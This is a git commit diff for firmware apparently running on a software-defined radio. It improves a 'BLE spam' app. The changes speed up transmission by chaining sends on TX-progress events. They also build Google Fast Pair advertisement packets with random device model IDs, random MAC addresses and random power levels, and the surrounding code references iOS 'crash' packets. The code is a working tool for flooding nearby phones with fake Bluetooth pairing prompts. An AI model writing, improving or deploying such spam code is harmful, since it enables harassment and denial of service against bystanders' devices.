Ble spam improvements (#1626)

* Much faster ble  spam tx
* Better Android handling
This commit is contained in:
Totoo 2023-12-09 09:24:02 +01:00 committed by GitHub
parent 60d95447fb
commit ff882024d4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 46 additions and 26 deletions

View File

@ -104,7 +104,7 @@ BLESpamView::BLESpamView(NavigationView& nav)
console.writeln("Based on work of:"); console.writeln("Based on work of:");
console.writeln("@Willy-JL, @ECTO-1A,"); console.writeln("@Willy-JL, @ECTO-1A,");
console.writeln("@Spooks4576, @iNetro"); console.writeln("@Spooks4576, @iNetro");
console.writeln("");
changePacket(true); // init changePacket(true); // init
} }
@ -140,6 +140,15 @@ void BLESpamView::randomizeMac() {
mac[12] = '\0'; // Null-terminate the string mac[12] = '\0'; // Null-terminate the string
} }
void BLESpamView::on_tx_progress(const bool done) {
if (done) {
if (is_running) {
changePacket(false);
baseband::set_btletx(channel_number, mac, advertisementData, pduType);
}
}
}
void BLESpamView::furi_hal_random_fill_buf(uint8_t* buf, uint32_t len) { void BLESpamView::furi_hal_random_fill_buf(uint8_t* buf, uint32_t len) {
for (uint32_t i = 0; i < len; i += 4) { for (uint32_t i = 0; i < len; i += 4) {
const uint32_t random_val = rand(); const uint32_t random_val = rand();
@ -473,23 +482,38 @@ void BLESpamView::createIosPacket(bool crash = false) {
} }
void BLESpamView::createFastPairPacket() { void BLESpamView::createFastPairPacket() {
uint32_t model; uint32_t model = fastpairModels[rand() % fastpairModels_count].value;
model = fastpairModels[rand() % fastpairModels_count].value; uint8_t size = 14;
uint8_t* packet = (uint8_t*)malloc(size);
uint8_t i = 0;
packet[i++] = 3; // Size
packet[i++] = 0x03; // AD Type (Service UUID List)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = 6; // Size
packet[i++] = 0x16; // AD Type (Service Data)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = (model >> 0x10) & 0xFF; // Device Model
packet[i++] = (model >> 0x08) & 0xFF; // ...
packet[i++] = (model >> 0x00) & 0xFF; // ...
packet[i++] = 2; // Size
packet[i++] = 0x0A; // AD Type (Tx Power Level)
packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
// size, packet
std::string res = to_string_hex_array(packet, size);
memset(advertisementData, 0, sizeof(advertisementData)); memset(advertisementData, 0, sizeof(advertisementData));
// 0 0 6 std::copy(res.begin(), res.end(), advertisementData);
const char* source = "03032CFE06162CFED5A59E020AB4\0"; free(packet);
memcpy(advertisementData, source, 28);
advertisementData[16] = uint_to_char((model >> 20) & 0x0F, 16);
advertisementData[17] = uint_to_char((model >> 16) & 0x0F, 16);
advertisementData[18] = uint_to_char((model >> 12) & 0x0F, 16);
advertisementData[19] = uint_to_char((model >> 8) & 0x0F, 16);
advertisementData[20] = uint_to_char((model >> 4) & 0x0F, 16);
advertisementData[21] = uint_to_char((model >> 0) & 0x0F, 16);
} }
void BLESpamView::changePacket(bool forced = false) { void BLESpamView::changePacket(bool forced = false) {
counter++; // need to send it multiple times to be accepted counter++; // need to send it multiple times to be accepted
if (counter >= 3 || forced) { if (counter >= 4 || forced) {
// really change packet and mac. // really change packet and mac.
counter = 0; counter = 0;
randomizeMac(); randomizeMac();
@ -516,21 +540,15 @@ void BLESpamView::changePacket(bool forced = false) {
} }
// rate limit console display // rate limit console display
displayCounter++; displayCounter++;
if (displayCounter > 5) { if (displayCounter > 25) {
displayCounter = 0; displayCounter = 0;
console.writeln(advertisementData); console.writeln(advertisementData);
} }
} }
} }
// called each 1/60th of second, so 6 = 100ms
void BLESpamView::on_timer() {
if (is_running) {
changePacket();
reset();
}
}
BLESpamView::~BLESpamView() { BLESpamView::~BLESpamView() {
is_running = false;
stop(); stop();
} }

View File

@ -145,17 +145,19 @@ class BLESpamView : public View {
void createSamsungPacket(); void createSamsungPacket();
void createWindowsPacket(); void createWindowsPacket();
void changePacket(bool forced); void changePacket(bool forced);
void on_timer(); void on_tx_progress(const bool done);
uint64_t get_freq_by_channel_number(uint8_t channel_number); uint64_t get_freq_by_channel_number(uint8_t channel_number);
void randomizeMac(); void randomizeMac();
void randomChn(); void randomChn();
void furi_hal_random_fill_buf(uint8_t* buf, uint32_t len); void furi_hal_random_fill_buf(uint8_t* buf, uint32_t len);
MessageHandlerRegistration message_handler_frame_sync{ MessageHandlerRegistration message_handler_tx_progress{
Message::ID::DisplayFrameSync, Message::ID::TXProgress,
[this](const Message* const) { [this](const Message* const p) {
this->on_timer(); const auto message = *reinterpret_cast<const TXProgressMessage*>(p);
this->on_tx_progress(message.done);
}}; }};
// continuity // continuity